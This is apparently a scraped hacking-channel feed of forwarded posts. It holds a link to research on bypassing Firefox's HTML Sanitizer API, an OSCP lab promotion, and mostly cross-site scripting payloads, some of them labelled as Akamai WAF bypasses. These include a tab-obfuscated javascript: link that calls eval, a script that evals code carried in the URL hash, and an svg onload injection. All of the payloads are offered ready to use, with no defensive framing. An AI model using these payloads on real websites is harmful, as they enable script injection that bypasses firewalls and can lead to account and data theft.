Bypassing Firefox's HTML Sanitizer API
https://portswigger.net/research/bypassing-firefoxs-html-sanitizer-api
We selected 11 machines in the #PEN200 #pwk labs and provided guidance on how to compromise them: offs.ec/3OJFXDi
#oscp #offensivesecurity
OSCP Training pinned «https://xn--r1a.website/bug_bounty_bootcamp»
Forwarded from Web Hacking
Akamai WAF bypass
<A href="javascrip%09t:eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
Forwarded from Web Hacking
A nice way to store the payload
"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>
Forwarded from Web Hacking
A payload to bypass Akamai WAF
<A href="javascrip%09t:eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
Forwarded from Web Hacking
Another one
"><img/src/style=html:url("data:,"><svg/onload=confirm(69)>")>